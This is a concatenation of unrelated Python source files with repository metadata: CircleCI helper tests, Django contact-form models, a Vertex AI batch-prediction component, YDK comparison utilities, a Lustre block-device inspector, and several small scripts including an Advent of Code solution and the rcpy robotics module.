return circle_ci._provider_slug(repo_url)
def test_github(self):
from ci_diff_helper import circle_ci
repo_url = 'https://github.com/hi/goodbye'
provider, slug = self._call_function_under_test(repo_url)
self.assertIs(provider, circle_ci.CircleCIRepoProvider.github)
self.assertEqual(slug, 'hi/goodbye')
def test_github_bad_prefix(self):
with self.assertRaises(ValueError):
self._call_function_under_test('http://github.com/org/repo')
def test_bitbucket(self):
from ci_diff_helper import circle_ci
repo_url = 'https://bitbucket.org/fly/on-the-wall'
provider, slug = self._call_function_under_test(repo_url)
self.assertIs(provider, circle_ci.CircleCIRepoProvider.bitbucket)
self.assertEqual(slug, 'fly/on-the-wall')
def test_bitbucket_bad_prefix(self):
with self.assertRaises(ValueError):
self._call_function_under_test('http://bitbucket.org/user/proj')
def test_bad_url(self):
with self.assertRaises(ValueError):
self._call_function_under_test('nope')
class TestCircleCIRepoProvider(unittest.TestCase):
@staticmethod
def _get_target_class():
from ci_diff_helper import circle_ci
return circle_ci.CircleCIRepoProvider
def _make_one(self, enum_val):
klass = self._get_target_class()
return klass(enum_val)
def test_members(self):
klass = self._get_target_class()
self.assertEqual(
set([enum_val.name for enum_val in klass]),
set(['bitbucket', 'github']))
def test_bitbucket(self):
klass = self._get_target_class()
provider_obj = self._make_one('bitbucket')
self.assertIs(provider_obj, klass.bitbucket)
def test_github(self):
klass = self._get_target_class()
provider_obj = self._make_one('github')
self.assertIs(provider_obj, klass.github)
def test_invalid(self):
with self.assertRaises(ValueError):
self._make_one('mustard')
class TestCircleCI(unittest.TestCase):
@staticmethod
def _get_target_class():
from ci_diff_helper import circle_ci
return circle_ci.CircleCI
def _make_one(self):
klass = self._get_target_class()
return klass()
def test_constructor(self):
from ci_diff_helper import _utils
klass = self._get_target_class()
config = self._make_one()
self.assertIsInstance(config, klass)
self.assertIs(config._active, _utils.UNSET)
self.assertIs(config._base, _utils.UNSET)
self.assertIs(config._branch, _utils.UNSET)
self.assertIs(config._is_merge, _utils.UNSET)
self.assertIs(config._pr, _utils.UNSET)
self.assertIs(config._pr_info_cached, _utils.UNSET)
self.assertIs(config._provider, _utils.UNSET)
self.assertIs(config._repo_url, _utils.UNSET)
self.assertIs(config._slug, _utils.UNSET)
self.assertIs(config._tag, _utils.UNSET)
def test___repr__(self):
import mock
config = self._make_one()
with mock.patch('os.environ', new={}):
self.assertEqual(repr(config), '<CircleCI (active=False)>')
def _pr_helper(self, pr_val):
import mock
from ci_diff_helper import _utils
config = self._make_one()
# Make sure there is no _pr value set.
self.assertIs(config._pr, _utils.UNSET)
# Patch the helper so we can control the value.
travis_pr_patch = mock.patch(
'ci_diff_helper.circle_ci._circle_ci_pr', return_value=pr_val)
with travis_pr_patch as mocked:
result = config.pr
self.assertIs(result, pr_val)
mocked.assert_called_once_with()
return config
def test_pr_property(self):
pr_val = 1337
self._pr_helper(pr_val)
def test_pr_property_cache(self):
pr_val = 42043
config = self._pr_helper(pr_val)
# Test that the value is cached.
self.assertIs(config._pr, pr_val)
# Test that cached value is re-used.
self.assertIs(config.pr, pr_val)
def test_in_pr_property(self):
config = self._make_one()
# Patch with an actual PR.
config._pr = 1337
self.assertTrue(config.in_pr)
def test_in_pr_property_fails(self):
config = self._make_one()
# Patch a missing PR.
config._pr = None
self.assertFalse(config.in_pr)
def _repo_url_helper(self, repo_url_val):
import mock
from ci_diff_helper import _utils
config = self._make_one()
# Make sure there is no _repo_url value set.
self.assertIs(config._repo_url, _utils.UNSET)
# Patch the helper so we can control the value.
repo_url_patch = mock.patch(
'ci_diff_helper.circle_ci._repo_url',
return_value=repo_url_val)
with repo_url_patch as mocked:
result = config.repo_url
self.assertIs(result, repo_url_val)
mocked.assert_called_once_with()
return config
def test_repo_url_property(self):
repo_url_val = 'reap-oh-no-you-are-elle'
self._repo_url_helper(repo_url_val)
def test_repo_url_property_cache(self):
repo_url_val = 'read-poem-earl'
config = self._repo_url_helper(repo_url_val)
# Test that the value is cached.
self.assertIs(config._repo_url, repo_url_val)
# Test that cached value is re-used.
self.assertIs(config.repo_url, repo_url_val)
def _slug_provider_helper(self, provider_val, slug_val, slug_first=False):
import mock
from ci_diff_helper import _utils
config = self._make_one()
config._repo_url = mock.sentinel.repo_url
# Make sure there is no _provider value set.
self.assertIs(config._provider, _utils.UNSET)
# Patch the helper so we can control the value.
provider_patch = mock.patch(
'ci_diff_helper.circle_ci._provider_slug',
return_value=(provider_val, slug_val))
with provider_patch as mocked:
if slug_first:
self.assertIs(config.slug, slug_val)
self.assertIs(config.provider, provider_val)
else:
self.assertIs(config.provider, provider_val)
self.assertIs(config.slug, slug_val)
mocked.assert_called_once_with(mock.sentinel.repo_url)
return config
def test_provider_property(self):
provider_val = 'pro-divide-uhr'
self._slug_provider_helper(provider_val, None)
def test_provider_property_cache(self):
provider_val = 'pro-bono-vide'
config = self._slug_provider_helper(provider_val, None)
# Test that the value is cached.
self.assertIs(config._provider, provider_val)
# Test that cached value is re-used.
self.assertIs(config.provider, provider_val)
def test_slug_property(self):
slug_val = 'slug-slugger-sluggest'
self._slug_provider_helper(None, slug_val, slug_first=True)
def test_slug_property_cache(self):
slug_val = 'soup'
config = self._slug_provider_helper(
None, slug_val, slug_first=True)
# Test that the value is cached.
self.assertIs(config._slug, slug_val)
# Test that cached value is re-used.
self.assertIs(config.slug, slug_val)
def test__pr_info_property_cache(self):
import mock
config = self._make_one()
config._pr_info_cached = mock.sentinel.info
self.assertIs(config._pr_info, mock.sentinel.info)
def test__pr_info_property_non_pr(self):
from ci_diff_helper import _utils
config = self._make_one()
# Fake that there is no PR.
config._pr = None
self.assertIsNone(config.pr)
# Make sure the cached value isn't set.
self.assertIs(config._pr_info_cached, _utils.UNSET)
# Now compute the property value.
self.assertEqual(config._pr_info, {})
def test__pr_info_property_github_pr(self):
import mock
from ci_diff_helper import circle_ci
from ci_diff_helper import environment_vars as env
config = self._make_one()
slug = 'arf/garf'
repo_url = circle_ci._GITHUB_PREFIX + slug
pr_id = 223311
mock_env = {
env.CIRCLE_CI_REPO_URL: repo_url,
env.CIRCLE_CI_PR_NUM: str(pr_id),
}
with mock.patch('os.environ', new=mock_env):
with mock.patch('ci_diff_helper._github.pr_info',
return_value=mock.sentinel.info) as get_info:
pr_info = config._pr_info
self.assertIs(pr_info, mock.sentinel.info)
get_info.assert_called_once_with(slug, pr_id)
self.assertEqual(get_info.call_count, 1)
# Make sure value is cached and doesn't call the helper again.
self.assertIs(pr_info, mock.sentinel.info)
self.assertEqual(get_info.call_count, 1)
def test__pr_info_property_pr_not_github(self):
import mock
from ci_diff_helper import circle_ci
from ci_diff_helper import environment_vars as env
config = self._make_one()
slug = 'bucket/chuck-it'
repo_url = circle_ci._BITBUCKET_PREFIX + slug
mock_env = {
env.CIRCLE_CI_REPO_URL: repo_url,
env.CIRCLE_CI_PR_NUM: '817',
}
with mock.patch('os.environ', new=mock_env):
with mock.patch('ci_diff_helper._github.pr_info') as get_info:
with self.assertRaises(NotImplementedError):
getattr(config, '_pr_info')
get_info.assert_not_called()
def test_base_property_cache(self):
import mock
config = self._make_one()
config._base = mock.sentinel.base
self.assertIs(config.base, mock.sentinel.base)
def test_base_property_non_pr(self):
config = self._make_one()
# Fake that we are outside a PR.
config._pr = None
with self.assertRaises(NotImplementedError):
getattr(config, 'base')
def test_base_property_success(self):
config = self._make_one()
# Fake that we are inside a PR.
config._pr = 123
base_sha = '23ff39e7f437d888cb1aa07b4646fc6376f4af35'
payload = {'base': {'sha': base_sha}}
config._pr_info_cached = payload
self.assertEqual(config.base, base_sha)
def test_base_property_pr_bad_payload(self):
config = self._make_one()
# Fake that we are inside a PR.
config._pr = 678
config._pr_info_cached = {}
# Also fake the info that shows up in the exception.
config._slug = 'foo/food'
with self.assertRaises(KeyError):
getattr(config, 'base')
| 2.484375 | 2 |
cmsplugin_contact_form/models.py | cesarrdz999/djangocms-contact-form | 2 | 12766840 | <reponame>cesarrdz999/djangocms-contact-form<filename>cmsplugin_contact_form/models.py<gh_stars>1-10
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from cms.models import CMSPlugin
@python_2_unicode_compatible
class ContactFormCMS(CMSPlugin):
smtp_server = models.CharField(
blank=False,
max_length=255
)
smtp_port = models.CharField(
blank=False,
max_length=10
)
email = models.CharField(
blank=False,
max_length=255
)
password = models.CharField(
blank=False,
max_length=255
)
use_tls = models.BooleanField()
html_classes = models.CharField(
blank=True,
max_length=255
)
def __str__(self):
return self.email
@python_2_unicode_compatible
class ContactFormBaseFieldCMS(CMSPlugin):
label = models.CharField(
blank=False,
max_length=255
)
html_id = models.CharField(
blank=False,
max_length=50
)
html_name = models.CharField(
blank=False,
max_length=50
)
html_classes = models.CharField(
blank=True,
max_length=255
)
def __str__(self):
return self.label
@python_2_unicode_compatible
class ContactFormTextFieldCMS(ContactFormBaseFieldCMS):
html_placeholder = models.CharField(
blank=True,
max_length=255
)
default_value = models.CharField(
blank=True,
max_length=255
)
required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormEmailFieldCMS(ContactFormBaseFieldCMS):
html_placeholder = models.CharField(
blank=True,
max_length=255
)
default_value = models.CharField(
blank=True,
max_length=255
)
required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormPhoneFieldCMS(ContactFormBaseFieldCMS):
html_placeholder = models.CharField(
blank=True,
max_length=255
)
phone_pattern = models.CharField(
blank=True,
max_length=255
)
phone_max_length = models.CharField(
blank=True,
max_length=4
)
default_value = models.CharField(
blank=True,
max_length=255
)
required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormTextAreaFieldCMS(ContactFormBaseFieldCMS):
html_placeholder = models.CharField(
blank=True,
max_length=255
)
html_rows = models.CharField(
blank=True,
max_length=4
)
html_cols = models.CharField(
blank=True,
max_length=4
)
default_value = models.CharField(
blank=True,
max_length=255
)
required = models.BooleanField()
@python_2_unicode_compatible
class ContactFormCheckboxFieldCMS(ContactFormBaseFieldCMS):
value = models.CharField(
blank=False,
max_length=255
)
checked = models.BooleanField()
@python_2_unicode_compatible
class ContactFormSubmitFieldCMS(ContactFormBaseFieldCMS):
type = models.CharField(
blank=False,
max_length=255,
choices=[
('button', 'Button'),
('input', 'Input')
]
) | 2.078125 | 2 |
infopages/views.py | OhmGeek/TechSite | 0 | 12766841 | from django.shortcuts import render
from .models import InfoPage
# Create your views here.
def view_page(request, slug):
# Look up the slug.
page = InfoPage.objects.get(slug=slug)
page_data = {
"page": page
}
return render(request, 'infopages/view_page.html', page_data)
| 2.15625 | 2 |
custom_components/batch_prediction_vertex.py | taocao/Continuous-Adaptation-for-Machine-Learning-System-to-Data-Changes | 15 | 12766842 | """
This component launches a Batch Prediction job on Vertex AI.
Know more about Vertex AI Batch Predictions jobs, go here:
https://cloud.google.com/vertex-ai/docs/predictions/batch-predictions.
"""
from google.cloud import storage
from tfx.dsl.component.experimental.annotations import Parameter, InputArtifact
from tfx.dsl.component.experimental.decorators import component
from tfx.types.standard_artifacts import String
import google.cloud.aiplatform as vertex_ai
from absl import logging
@component
def BatchPredictionGen(
gcs_source: InputArtifact[String],
project: Parameter[str],
location: Parameter[str],
model_resource_name: Parameter[str],
job_display_name: Parameter[str],
gcs_destination: Parameter[str],
instances_format: Parameter[str] = "file-list",
machine_type: Parameter[str] = "n1-standard-2",
accelerator_count: Parameter[int] = 0,
accelerator_type: Parameter[str] = None,
starting_replica_count: Parameter[int] = 1,
max_replica_count: Parameter[int] = 1,
):
"""
gcs_source: A location inside GCS to be used by the Batch Prediction job to get its inputs.
Rest of the parameters are explained here: https://git.io/JiUyU.
"""
storage_client = storage.Client()
# Read GCS Source (gcs_source contains the full path of GCS object).
# 1-1. get bucketname from gcs_source
gcs_source_uri = gcs_source.uri.split("//")[1:][0].split("/")
bucketname = gcs_source_uri[0]
bucket = storage_client.get_bucket(bucketname)
logging.info(f"bucketname: {bucketname}")
# 1-2. get object path without the bucket name.
objectpath = "/".join(gcs_source_uri[1:])
# 1-3. read the object to get value set by OutputArtifact from FileListGen.
blob = bucket.blob(objectpath)
logging.info(f"objectpath: {objectpath}")
gcs_source = f"gs://{blob.download_as_text()}"
# Get Model.
vertex_ai.init(project=project, location=location)
model = vertex_ai.Model.list(
filter=f"display_name={model_resource_name}", order_by="update_time"
)[-1]
# Launch a Batch Prediction job.
logging.info("Starting batch prediction job.")
logging.info(f"GCS path where file list is: {gcs_source}")
batch_prediction_job = model.batch_predict(
job_display_name=job_display_name,
instances_format=instances_format,
gcs_source=gcs_source,
gcs_destination_prefix=gcs_destination,
machine_type=machine_type,
accelerator_count=accelerator_count,
accelerator_type=accelerator_type,
starting_replica_count=starting_replica_count,
max_replica_count=max_replica_count,
sync=True,
)
logging.info(batch_prediction_job.display_name)
logging.info(batch_prediction_job.resource_name)
logging.info(batch_prediction_job.state)
| 2.5625 | 3 |
sam/datasets/__init__.py | junj2ejj/sam-textvqa | 48 | 12766843 | <reponame>junj2ejj/sam-textvqa
from .stvqa_dataset import STVQADataset
from .textvqa_dataset import TextVQADataset
DatasetMapTrain = {
"textvqa": TextVQADataset,
"stvqa": STVQADataset,
}
| 1.375 | 1 |
sdk/python/core/tests/compare.py | ygorelik/pydk | 0 | 12766844 | # ----------------------------------------------------------------
# Copyright 2016 Cisco Systems
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ------------------------------------------------------------------
"""compare.py
return True if attributes in entity(lhs) = entity(rhs)
"""
import logging
from enum import Enum
from ydk.types import (Empty, Decimal64, FixedBitsDict,
YList, YListItem, YLeafList)
import sys
if sys.version_info > (3,):
long = int
LOGGER = logging.getLogger('ydk.tests.unittest')
LOGGER.setLevel(logging.DEBUG)
def is_builtin_type(attr):
# all the deridved types should have __cmp__ implemented
if (isinstance(attr, (int, bool, dict, str, int, long, float)) or
isinstance(attr, (Enum, Empty, Decimal64, FixedBitsDict)) or
isinstance(attr, (YLeafList, YListItem))):
return True
else:
return False
class ErrNo(Enum):
WRONG_VALUE = 0
WRONG_TYPES = 1
POPULATION_FAILED = 2
WRONG_DICT = 3
WRONG_DICT_VALUE = 4
WRONG_CLASS = 5
class ErrorMsg(object):
def __init__(self, lhs, rhs, errno):
self.lhs = lhs
self.rhs = rhs
self.errno = errno
def __str__(self):
rhs, lhs, errno = self.rhs, self.lhs, self.errno
errlhs = "\tlhs = %s, type: %s;\n" % (str(lhs), type(lhs))
errrhs = "\trhs = %s, type: %s;\n" % (str(rhs), type(rhs))
if errno == ErrNo.WRONG_VALUE:
errtyp = "Wrong value:\n"
elif errno == ErrNo.WRONG_TYPES:
errtyp = "Wrong types: not comparable\n"
elif errno == ErrNo.WRONG_CLASS:
errtyp = "Wrong types:\n"
elif errno == ErrNo.POPULATION_FAILED:
errtyp = "Failed population:\n"
elif errno == ErrNo.WRONG_DICT:
errtyp = "Wrong dict: different dictionary key\n"
return ''.join([errtyp, errlhs, errrhs])
def print_err(self):
error_str = str(self)
LOGGER.debug(error_str)
def is_equal(lhs, rhs):
ret, errtyp = True, None
if lhs is None and rhs is None or \
isinstance(lhs, list) and isinstance(rhs, list) and not lhs and not rhs:
pass
elif is_builtin_type(lhs) or is_builtin_type(rhs):
try:
if lhs != rhs and not _equal_enum(lhs, rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif lhs is None or rhs is None:
errtyp, ret = ErrNo.POPULATION_FAILED, False
elif isinstance(lhs, YList) and isinstance(rhs, YList) or \
isinstance(lhs, list) and isinstance(rhs, list):
if len(lhs) != len(rhs):
errtyp, ret = ErrNo.WRONG_VALUE, False
else:
cmp_lst = list(zip(lhs, rhs))
ret = True
for (left, right) in cmp_lst:
ret |= is_equal(left, right)
elif lhs.__class__ != rhs.__class__:
errtyp, ret = ErrNo.WRONG_CLASS, False
else:
dict_lhs, dict_rhs = lhs.__dict__, rhs.__dict__
len_lhs = len(dict_lhs)
len_rhs = len(dict_rhs)
if 'i_meta' in dict_lhs:
len_lhs -= 1
if 'i_meta' in dict_rhs:
len_rhs -= 1
if len_lhs != len_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
for k in dict_lhs:
if k == 'parent' or k == 'i_meta':
continue
elif is_builtin_type(dict_lhs[k]) or is_builtin_type(dict_rhs[k]):
try:
if dict_lhs[k] != dict_rhs[k] and not _equal_enum(dict_lhs[k], dict_rhs[k]):
lhs = dict_lhs[k]
rhs = dict_rhs[k]
errtyp, ret = ErrNo.WRONG_VALUE, False
except Exception:
errtyp, ret = ErrNo.WRONG_TYPES, False
elif k not in dict_rhs:
errtyp, ret = ErrNo.WRONG_DICT, False
elif not is_equal(dict_lhs[k], dict_rhs[k]):
ret = False
if ret is False and errtyp is not None:
err_msg = ErrorMsg(rhs, lhs, errtyp)
err_msg.print_err()
return ret
def _equal_enum(rhs, lhs):
return all((isinstance(rhs, Enum),
isinstance(lhs, Enum),
rhs.name == lhs.name))
| 2.0625 | 2 |
iml_common/blockdevices/blockdevice_linux.py | intel-hpdd/iml-common | 1 | 12766845 | <reponame>intel-hpdd/iml-common
# Copyright (c) 2018 DDN. All rights reserved.
# Use of this source code is governed by a MIT-style
# license that can be found in the LICENSE file.
import re
import os
import subprocess
from collections import defaultdict
from tempfile import mktemp
from blockdevice import BlockDevice
from ..lib.shell import Shell
class BlockDeviceLinux(BlockDevice):
_supported_device_types = ["linux"]
TARGET_NAME_REGEX = "([\w-]+)-(MDT|OST)\w+"
def __init__(self, device_type, device_path):
super(BlockDeviceLinux, self).__init__(device_type, device_path)
def _check_module(self):
Shell.try_run(["/usr/sbin/udevadm", "info", "--path=/module/ldiskfs"])
@property
def filesystem_type(self):
"""
Verify if filesystem exists at self._device_path and return type
:return: type if exists, None otherwise
"""
occupying_fs = self._blkid_value("TYPE")
return occupying_fs
@property
def filesystem_info(self):
"""
Verify if filesystem exists at self._device_path and return message
:return: message indicating type if exists, None otherwise
"""
occupying_fs = self._blkid_value("TYPE")
return None if occupying_fs is None else "Filesystem found: type '%s'" % occupying_fs
@property
def uuid(self):
return self._blkid_value("UUID")
def _blkid_value(self, value):
result = Shell.run(["blkid", "-p", "-o", "value", "-s", value, self._device_path])
if result.rc == 2:
# blkid returns 2 if there is no filesystem on the device
return None
elif result.rc == 0:
result = result.stdout.strip()
if result:
return result
else:
# Empty filesystem: blkid returns 0 but prints no FS if it seems something non-filesystem-like
# like an MBR
return None
else:
raise RuntimeError(
"Unexpected return code %s from blkid %s: '%s' '%s'"
% (result.rc, self._device_path, result.stdout, result.stderr)
)
@property
def preferred_fstype(self):
return "ldiskfs"
def mgs_targets(self, log):
"""
If there is an MGS in the local targets, use debugfs to get a list of targets.
Return a dict of filesystem->(list of targets)
"""
result = defaultdict(lambda: [])
try:
self._check_module()
except Shell.CommandExecutionError:
log.info("ldiskfs is not loaded, skipping device MGS/filesystem detection")
return result
log.info("Searching Lustre logs for filesystems")
ls = Shell.try_run(["debugfs", "-c", "-R", "ls -l CONFIGS/", self._device_path])
filesystems = []
targets = []
for line in ls.split("\n"):
try:
name = line.split()[8]
match = re.search("([\w-]+)-client", name)
if match is not None:
log.info("Found a filesystem of name %s" % match.group(1).__str__())
filesystems.append(match.group(1).__str__())
match = re.search(self.TARGET_NAME_REGEX, name)
if match is not None:
log.info("Found a target of name %s" % match.group(0).__str__())
targets.append(match.group(0).__str__())
except IndexError:
pass
# Read config log "<fsname>-client" for each filesystem
for fs in filesystems:
self._read_log("filesystem", fs, "%s-client" % fs, result, log)
self._read_log("filesystem", fs, "%s-param" % fs, result, log)
# Read config logs "testfs-MDT0000" etc
for target in targets:
self._read_log("target", target, target, result, log)
return result
def _read_log(self, conf_param_type, conf_param_name, log_name, result, log):
# NB: would use NamedTemporaryFile if we didn't support python 2.4
"""
Uses debugfs to parse information about the filesystem on a device. Return any mgs info
and config parameters about that device.
The reality is that nothing makes use of the conf_params anymore but the code existed and this routine
is unchanged from before 2.0 so I have left conf_params in.
:param conf_param_type: The type of configuration parameter to store
:type conf_param_type: str
:param conf_param_name: The name of the configuration parameter to store
:type conf_param_name: dict
:param log_name: The log name to dump the information about dev into
:type log_name: str
:param dev: The dev[vice] to parse for log information
:type dev: str
Returns: MgsTargetInfo containing targets and conf found.
"""
tmpfile = mktemp()
log.info("Reading log for %s:%s from log %s" % (conf_param_type, conf_param_name, log_name))
try:
Shell.try_run(["debugfs", "-c", "-R", "dump CONFIGS/%s %s" % (log_name, tmpfile), self._device_path])
if not os.path.exists(tmpfile) or os.path.getsize(tmpfile) == 0:
# debugfs returns 0 whether it succeeds or not, find out whether
# dump worked by looking for output file of some length. (LU-632)
return
client_log = subprocess.Popen(["llog_reader", tmpfile], stdout=subprocess.PIPE).stdout.read()
entries = client_log.split("\n#")[1:]
for entry in entries:
tokens = entry.split()
# ([\w=]+) covers all possible token[0] from
# lustre/utils/llog_reader.c @ 0f8dca08a4f68cba82c2c822998ecc309d3b7aaf
(code, action) = re.search("^\\((\d+)\\)([\w=]+)$", tokens[1]).groups()
if conf_param_type == "filesystem" and action == "setup":
# e.g. entry="#09 (144)setup 0:flintfs-MDT0000-mdc 1:flintfs-MDT0000_UUID 2:192.168.122.105@tcp"
label = re.search("0:([\w-]+)-\w+", tokens[2]).group(1)
fs_name = label.rsplit("-", 1)[0]
uuid = re.search("1:(.*)", tokens[3]).group(1)
nid = re.search("2:(.*)", tokens[4]).group(1)
log.info("Found log entry for uuid %s, label %s, nid %s" % (uuid, label, nid))
result[fs_name].append({"uuid": uuid, "name": label, "nid": nid})
elif action == "param" or (action == "SKIP" and tokens[2] == "param"):
if action == "SKIP":
clear = True
tokens = tokens[1:]
else:
clear = False
# e.g. entry="#29 (112)param 0:flintfs-client 1:llite.max_cached_mb=247.9"
# has conf_param name "flintfs.llite.max_cached_mb"
object = tokens[2][2:]
if len(object) == 0:
# e.g. "0: 1:sys.at_max=1200" in an OST log: it is a systemwide
# setting
param_type = conf_param_type
param_name = conf_param_name
elif re.search(self.TARGET_NAME_REGEX, object):
# Identify target params
param_type = "target"
param_name = re.search(self.TARGET_NAME_REGEX, object).group(0)
else:
# Fall through here for things like 0:testfs-llite, 0:testfs-clilov
param_type = conf_param_type
param_name = conf_param_name
if tokens[3][2:].find("=") != -1:
key, val = tokens[3][2:].split("=")
else:
key = tokens[3][2:]
val = True
if clear:
val = None
log.info("Found conf param %s:%s:%s of %s" % (param_type, param_name, key, val))
# 2.2 don't save the conf params because nothing reads them and zfs doesn't seem to produce them
# so keep the code - but just don't store.
# This change is being made on the FF date hence the caution.
# self.conf_params[param_type][param_name][key] = val
finally:
if os.path.exists(tmpfile):
os.unlink(tmpfile)
def targets(self, uuid_name_to_target, device, log):
try:
self._check_module()
except Shell.CommandExecutionError:
log.info("ldiskfs is not loaded, skipping device %s" % device["path"])
return self.TargetsInfo([], None)
log.info(
"Searching device %s of type %s, uuid %s for a Lustre filesystem"
% (device["path"], device["type"], device["uuid"])
)
result = Shell.run(["tunefs.lustre", "--dryrun", device["path"]])
if result.rc != 0:
log.info("Device %s did not have a Lustre filesystem on it" % device["path"])
return self.TargetsInfo([], None)
# For a Lustre block device, extract name and params
# ==================================================
name = re.search("Target:\\s+(.*)\n", result.stdout).group(1)
flags = int(re.search("Flags:\\s+(0x[a-fA-F0-9]+)\n", result.stdout).group(1), 16)
params_re = re.search("Parameters:\\ ([^\n]+)\n", result.stdout)
if params_re:
# Dictionary of parameter name to list of instance values
params = defaultdict(list)
# FIXME: naive parse: can these lines be quoted/escaped/have spaces?
for lustre_property, value in [t.split("=") for t in params_re.group(1).split()]:
params[lustre_property].extend(
re.split(BlockDeviceLinux.lustre_property_delimiters[lustre_property], value)
)
else:
params = {}
if name.find("ffff") != -1:
log.info("Device %s reported an unregistered lustre target and so will not be reported" % device["path"])
return self.TargetsInfo([], None)
if flags & 0x0005 == 0x0005:
# For combined MGS/MDT volumes, synthesise an 'MGS'
names = ["MGS", name]
else:
names = [name]
return self.TargetsInfo(names, params)
| 2.15625 | 2 |
py/pv.py | wulffern/aic2022 | 0 | 12766846 | #!/usr/bin/env python3
import numpy as np
import matplotlib.pyplot as plt
m = 1e-3
i_load = np.logspace(-5,-3)
i_load = np.linspace(1e-5,1e-3,200)
i_s = 1e-12
i_ph = 1e-3
V_T = 1.38e-23*300/1.6e-19
V_D = V_T*np.log((i_ph - i_load)/(i_s) + 1)
P_load = V_D*i_load
plt.subplot(2,1,1)
plt.plot(i_load/m,V_D)
plt.ylabel("Diode voltage [V]")
plt.grid()
plt.subplot(2,1,2)
plt.plot(i_load/m,P_load/m)
plt.xlabel("Current load [mA]")
plt.ylabel("Power Load [mW]")
plt.grid()
plt.savefig("pv.pdf")
plt.show()
| 2.578125 | 3 |
python/gameinfo.py | pason-systems/battle-tanks-client-stubs | 2 | 12766847 | <reponame>pason-systems/battle-tanks-client-stubs
class GameInfo(object):
"""
holds player information for the current game
"""
def __init__(self, team_name, match_token, team_password, client_token = ''):
self.client_token = client_token
self.team_name = team_name
self.match_token = match_token
self.team_password = <PASSWORD>_password | 2.6875 | 3 |
ntcli.py | ALMSIVI/novel_tools | 1 | 12766848 | import argparse
from pathlib import Path
from novel_tools.toolkit import analyze, docgen
from novel_tools.utils import get_config
def do_analyze(args):
config_filename = args.toolkit + '_config.json'
input_path = Path(args.input)
output_path = Path(args.output) if args.output is not None else None
if input_path.is_file():
in_dir = input_path.parent
config = get_config(config_filename, in_dir)
analyze(config, filename=input_path, out_dir=output_path)
else:
config = get_config(config_filename, input_path)
analyze(config, in_dir=input_path, out_dir=output_path)
def start():
parser = argparse.ArgumentParser(description='Novel Tools command line interface.')
subparsers = parser.add_subparsers(help='Tools provided by this package.', dest='command', required=True)
# Framework functions #
analyze_parser = subparsers.add_parser('analyze', description='Analyzes the novel file(s).')
analyze_parser.add_argument('-t', '--toolkit',
help='The toolkit that will be executed. Built-in toolkits include'
'struct, create, split, struct_dir, and create_dir. If a custom toolkit is given, '
'make sure to have <toolkit>_config.json under the input directory.')
analyze_parser.add_argument('-i', '--input',
help='Input filename or directory name. If it is a file, it will only be recognized by'
' TextReader, and it must contain the full path.')
analyze_parser.add_argument('-o', '--output', default=None, help='Output directory name.')
analyze_parser.set_defaults(func=do_analyze)
# generate_docs
doc_parser = subparsers.add_parser('docgen', description='Generates documentation for framework classes.')
doc_parser.add_argument('-c', '--config_filename', default=None,
help='Filename of the config which specifies additional packages.')
doc_parser.add_argument('-d', '--doc_filename', default=None, help='Filename of the output doc file.')
doc_parser.set_defaults(func=lambda a: docgen(a.config_filename, a.doc_filename))
args = parser.parse_args()
args.func(args)
if __name__ == '__main__':
start()
| 2.796875 | 3 |
2020/09/day9.py | jscpeterson/advent-of-code-2020 | 0 | 12766849 | from itertools import combinations
def get_data(filepath):
return [int(line) for line in open(filepath).readlines()]
def solve1(filepath, preamble):
inputs = get_data(filepath)
for i, line in enumerate(inputs):
if i <= preamble:
continue
sums = set(sum(comb) for comb in combinations(inputs[i-preamble:i], 2))
if line not in sums:
return line
def solve2(filepath, preamble):
target = solve1(filepath, preamble)
inputs = get_data(filepath)
for i, input1 in enumerate(inputs):
for i2, input2 in enumerate(inputs[i:]):
values = inputs[i:i2]
sum_ = sum(values)
if sum_ == target:
return min(values)+max(values)
if sum_ > target:
break
assert solve1('test', 5) == 127
print('Part 1: %d' % solve1('input', 25))
assert solve2('test', 5) == 62
print('Part 2: %s' % solve2('input', 25))
| 3.15625 | 3 |
rcpy/__init__.py | BrendanSimon/rcpy | 0 | 12766850 | import warnings
import signal
import sys, os, time
from rcpy._rcpy import initialize, cleanup, get_state
from rcpy._rcpy import set_state as _set_state
from rcpy._rcpy import cleanup as _cleanup
#from hanging_threads import start_monitoring
#monitoring_thread = start_monitoring()
# constants
IDLE = 0
RUNNING = 1
PAUSED = 2
EXITING = 3
# create pipes for communicating state
_RC_STATE_PIPE_LIST = []
def _get_state_pipe_list(p = _RC_STATE_PIPE_LIST):
return p
# creates pipes for communication
def create_pipe():
r_fd, w_fd = os.pipe()
_get_state_pipe_list().append((r_fd, w_fd))
return (r_fd, w_fd)
def destroy_pipe(pipe):
_get_state_pipe_list().remove(pipe)
(r_fd, w_fd) = pipe
os.close(r_fd)
os.close(w_fd)
# set state
def set_state(state):
# write to open pipes
for (r_fd, w_fd) in _get_state_pipe_list():
os.write(w_fd, bytes(str(state), 'UTF-8'))
# call robotics cape set_state
_set_state(state)
# cleanup function
_CLEANUP_FLAG = False
_cleanup_functions = {}
def add_cleanup(fun, pars):
global _cleanup_functions
_cleanup_functions[fun] = pars
def cleanup():
global _CLEANUP_FLAG
global _cleanup_functions
# return to avoid multiple calls to cleanup
if _CLEANUP_FLAG:
return
_CLEANUP_FLAG = True
print('Initiating cleanup...')
# call cleanup functions
for fun, pars in _cleanup_functions.items():
fun(*pars)
# get state pipes
pipes = _get_state_pipe_list()
if len(pipes):
print('{} pipes open'.format(len(pipes)))
# set state as exiting
set_state(EXITING)
print('Calling roboticscape cleanup')
# call robotics cape cleanup
_cleanup()
if len(pipes):
print('Closing pipes')
# close open pipes left
while len(pipes):
destroy_pipe(pipes[0])
print('Dnoe with cleanup')
# idle function
def idle():
set_state(IDLE)
# run function
def run():
set_state(RUNNING)
# pause function
def pause():
set_state(PAUSED)
# exit function
def exit():
set_state(EXITING)
# cleanup handler
def handler(signum, frame):
# warn
warnings.warn('Signal handler called with signal {}'.format(signum))
# call rcpy cleanup
cleanup()
# no need to cleanup later
